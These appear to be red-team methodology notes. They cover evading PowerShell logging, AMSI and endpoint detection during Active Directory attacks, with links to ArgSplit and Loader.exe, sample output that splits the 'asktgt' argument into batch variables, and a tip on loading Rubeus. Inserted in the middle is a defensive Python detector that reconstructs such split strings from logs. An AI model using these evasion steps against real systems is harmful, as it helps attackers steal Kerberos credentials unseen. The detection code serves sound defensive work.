methodology

Powershell scripts

Use InviShell to disable PowerShell logging; it has a built-in AMSI bypass.

Alternatively, use an AMSI bypass.

If static detection is a problem, try obfuscating the tool.

Binaries

https://raw.githubusercontent.com/Raptoratack/ADTools/refs/heads/main/ArgSplit.bat
https://github.com/Raptoratack/ADTools/blob/main/Loader.exe

Use ArgSplit to obfuscate the command argument (e.g. kerberoast, asktgt, etc.). Copy and paste all of the set lines it prints:

[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"

Check that the %Pwn% variable expands to the argument we want.
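The split above keeps the literal argument out of the visible command line, but every character is still present in the set statements, so the string can be rebuilt from process or script logs. The following Python is an added example for the defensive side and is not part of this page or of the ArgSplit/ADTools project: it parses batch set statements from a handful of constructed log lines (the ArgSplit output shown above plus one benign PATH line), flags variables that are built purely from concatenated single-character variables (the pattern ArgSplit produces), and reconstructs the hidden string. The function names and the sample lines are my own.

```python
import re

# Constructed sample: the ArgSplit-style set statements from this page plus one
# ordinary PATH line, as they might appear in command-line or script-block logs.
SAMPLE_LINES = [
    '[+] Enter a string: asktgt',
    'set "z=t"',
    'set "y=g"',
    'set "x=t"',
    'set "w=k"',
    'set "v=s"',
    'set "u=a"',
    'set "Pwn=%u%%v%%w%%x%%y%%z%"',
    'set "PATH=%PATH%;C:\\tools"',
]

# Matches `set name=value` and `set "name=value"` (batch variable names are case-insensitive).
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
# Matches one %name% reference inside a value.
REF_RE = re.compile(r'%([^%]+)%')


def parse_set_lines(lines):
    """Collect lower-cased variable name -> raw (unexpanded) value from set statements."""
    env = {}
    for line in lines:
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
    return env


def _expand(value, env, visiting):
    """Substitute %name% references recursively; references already being
    expanded (e.g. PATH=%PATH%;...) are left untouched to avoid loops."""
    def repl(m):
        name = m.group(1).lower()
        if name in env and name not in visiting:
            return _expand(env[name], env, visiting | {name})
        return m.group(0)
    return REF_RE.sub(repl, value)


def resolve_variable(lines, name):
    """Return the fully expanded value of `name` as the batch interpreter would
    compute it from these lines, or None if it was never set."""
    env = parse_set_lines(lines)
    key = name.lower()
    if key not in env:
        return None
    return _expand(env[key], env, frozenset({key}))


def find_split_strings(lines, min_parts=3):
    """Flag variables whose value is nothing but a chain of references, each of
    which resolves to a single character. Returns {name: reconstructed_string}."""
    env = parse_set_lines(lines)
    findings = {}
    for name, raw in env.items():
        refs = REF_RE.findall(raw)
        # The whole value must consist of %x%%y%... references, nothing else.
        if len(refs) < min_parts or REF_RE.sub('', raw) != '':
            continue
        parts = [env.get(r.lower()) for r in refs]
        if all(p is not None and len(p) == 1 for p in parts):
            findings[name] = ''.join(parts)
    return findings


if __name__ == '__main__':
    for var, text in find_split_strings(SAMPLE_LINES).items():
        print(f'character-split variable {var!r} reconstructs to {text!r}')
```

The single-character check keeps the detector narrow: a normal value like PATH=%PATH%;C:\tools has one reference whose expansion is longer than one character, so it is not reported, while the Pwn chain is reconstructed to asktgt. resolve_variable gives the generic expansion when an analyst wants to see what any variable would have held.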

Use Loader.exe to load our binaries (Rubeus example):

Use Loader.exe with the behaviour detection bypass
